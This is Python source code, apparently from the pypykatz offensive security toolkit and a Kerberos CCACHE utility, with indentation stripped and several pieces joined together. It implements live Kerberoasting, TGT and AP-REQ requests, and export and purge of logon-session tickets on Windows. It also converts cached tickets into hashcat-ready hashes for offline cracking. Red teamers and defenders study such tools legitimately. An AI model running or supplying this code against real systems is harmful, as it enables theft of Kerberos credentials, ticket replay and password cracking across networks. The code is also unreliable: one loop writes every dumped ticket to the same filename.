def list_ccache(ccachefile):
cc = CCACHE.from_file(ccachefile)
table = []
table.append(['id'] + Credential.summary_header())
i = 0
for cred in cc.credentials:
table.append([str(i)] + cred.summary())
i += 1
print() #this line intentionally left blank
print_table(table)
def run_live(self, args):
if platform.system() != 'Windows':
print('[-]This command only works on Windows!')
return
from pypykatz.kerberos.kerberoslive import KerberosLive, live_roast # , purge, list_sessions #get_tgt, get_tgs
kl = KerberosLive()
if args.live_kerberos_module == 'roast':
res, errors, err = asyncio.run(live_roast(args.out_file))
if err is not None:
print('[LIVE][KERBEROS][ROAST] Error while roasting tickets! Reason: %s' % geterr(err))
return
if args.out_file is None:
for r in res:
print(r)
elif args.live_kerberos_module == 'tgt':
ticket = kl.get_tgt(args.target)
if args.out_file is None:
print_kirbi(ticket)
return
with open(args.out_file, 'wb') as f:
f.write(ticket)
elif args.live_kerberos_module == 'apreq':
apreq, sessionkey = kl.get_apreq(args.target)
print('APREQ b64: ')
print(format_kirbi(apreq.dump()))
print('Sessionkey b64: %s' % base64.b64encode(sessionkey).decode())
elif args.live_kerberos_module == 'currentluid':
print(hex(kl.get_current_luid()))
elif args.live_kerberos_module == 'purge':
luid = None
if args.luid is not None:
luid = args.luid
if luid.startswith('0x') is True:
luid = int(luid, 16)
luid=int(luid)
kl.purge(luid)
print('Tickets purged!')
elif args.live_kerberos_module == 'sessions':
kl.list_sessions()
elif args.live_kerberos_module == 'triage':
if args.luid is None:
ticketinfos = kl.get_all_ticketinfo()
else:
luid = KerberosCMDHelper.luid_converter(args.luid)
ticketinfos = kl.get_ticketinfo(luid)
table = [['LUID', 'ServerName', 'RealmName', 'StartTime', 'EndTime', 'RenewTime', 'EncryptionType', 'TicketFlags']]
for luid in ticketinfos:
if len(ticketinfos[luid]) == 0:
continue
for ticket in ticketinfos[luid]:
table.append([
hex(luid),
ticket['ServerName'],
ticket['RealmName'],
filetime_to_dt(ticket['StartTime']).isoformat(),
filetime_to_dt(ticket['EndTime']).isoformat(),
filetime_to_dt(ticket['RenewTime']).isoformat(),
str(ticket['EncryptionType']),
str(ticket['TicketFlags'])
])
print_table(table)
elif args.live_kerberos_module == 'dump':
if args.luid is None:
tickets = kl.export_all_ticketdata()
else:
luid = KerberosCMDHelper.luid_converter(args.luid)
tickets = kl.export_ticketdata(luid)
if args.outdir is not None:
for luid in tickets:
for ticket in tickets[luid]:
with open(args.outdir + 'ticket_%s.kirbi' % 'a', 'wb') as f:
f.write(ticket['Ticket'])
else:
for luid in tickets:
if len(tickets[luid]) == 0:
continue
print('LUID @%s' % hex(luid))
for ticket in tickets[luid]:
print_kirbi(ticket['Ticket'])
def main():
import argparse
parser = argparse.ArgumentParser(description='Tool to manipulate CCACHE files')
subparsers = parser.add_subparsers(help = 'commands')
subparsers.required = True
subparsers.dest = 'command'
roast_group = subparsers.add_parser('roast', help='Lists all tickets in hashcat-friendly format')
roast_group.add_argument('-a', '--allhash', action='store_true', help='Process all tickets, regardless of enctype')
roast_group.add_argument('-o', '--outfile', help='Output hash file name')
list_group = subparsers.add_parser('list', help='List all tickets in the file')
delete_group = subparsers.add_parser('del', help = 'Delete ticket(s) from file, store the new ccache file in a specified filename, or an automatically generated one')
delete_group.add_argument('-o', '--outfile', help='Output ccache file name')
delete_group.add_argument('-i','--id', type=int, action='append', help='Ticket ID to delete', required=True)
parser.add_argument('ccachefile', help='input CCACHE file')
args = parser.parse_args()
logging.basicConfig(level=logging.INFO)
logging.debug('Opening file %s' % args.ccachefile)
cc = CCACHE.from_file(args.ccachefile)
if args.command == 'list':
table = []
table.append(['id'] + Credential.summary_header())
i = 0
for cred in cc.credentials:
table.append([str(i)] + cred.summary())
i += 1
print() #this line intentionally left blank
print_table(table)
elif args.command == 'roast':
if args.outfile:
with open(args.outfile, 'wb') as f:
for h in cc.get_hashes(all_hashes = args.allhash):
f.write(h.encode() + b'\r\n')
else:
for h in cc.get_hashes(all_hashes = args.allhash):
print(h)
elif args.command == 'del':
#delete
output_filename = os.path.join(os.path.dirname(os.path.abspath(args.ccachefile)), '%s.edited.ccache' % ntpath.basename(args.ccachefile)) #sorry for this, im tired now :(
id = args.id
temp_cc = CCACHE()
temp_cc.file_format_version = cc.file_format_version
temp_cc.headers = cc.headers
temp_cc.primary_principal = cc.primary_principal
i = 0
for cred in cc.credentials:
if i in id:
i += 1
continue
temp_cc.credentials.append(cred)
i += 1
logging.info('Writing edited file to %s' % output_filename)
temp_cc.to_file(output_filename)